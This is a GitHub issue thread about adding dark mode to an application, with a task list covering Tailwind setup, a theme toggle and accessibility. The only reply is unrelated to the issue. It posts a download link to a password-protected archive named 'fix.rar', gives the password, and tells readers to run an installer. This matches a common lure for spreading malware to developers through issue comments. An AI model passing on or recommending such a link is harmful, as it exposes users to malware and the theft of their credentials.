### ISSUE TITLE
Issue 2: Dark Mode Implementation

### ISSUE THREAD

**Issue by Djordje-Stojanovic** [Djordje-Stojanovic/Stojanovic-One#71]
Description: Implement a dark mode theme across the application.
Tasks:
[ ] Set up Tailwind CSS for dark mode
[ ] Create a theme toggle component
[ ] Implement dark mode styles for all existing pages
[ ] Ensure proper color contrast and accessibility in dark mode
[ ] Add user preference persistence for theme choice

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
